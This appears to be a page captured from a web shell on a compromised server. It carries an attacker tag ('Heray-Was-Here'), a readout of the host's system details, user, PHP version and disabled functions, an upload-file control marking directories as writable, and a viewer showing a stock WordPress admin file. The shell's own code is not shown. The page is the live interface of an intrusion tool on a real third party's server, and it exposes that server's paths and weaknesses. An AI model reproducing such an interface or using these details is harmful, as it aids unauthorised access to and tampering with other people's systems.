Heray-Was-Here
Server : Apache
System : Linux msk.rackserver.ru 3.10.0-962.3.2.lve1.5.87.el7.x86_64 #1 SMP Tue Jan 28 09:38:56 UTC 2025 x86_64
User : pdez ( 1379)
PHP Version : 5.6.40
Disable Function : NONE
Directory :  /home/pdez/www/wp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/pdez/www/wp-admin/options-head.php
<?php
/**
 * WordPress Options Header.
 *
 * Displays updated message, if updated variable is part of the URL query.
 *
 * @package WordPress
 * @subpackage Administration
 */

wp_reset_vars( array( 'action' ) );

if ( isset( $_GET['updated'] ) && isset( $_GET['page'] ) ) {
	// For back-compat with plugins that don't use the Settings API and just set updated=1 in the redirect.
	add_settings_error( 'general', 'settings_updated', __( 'Settings saved.' ), 'success' );
}

settings_errors();

Hry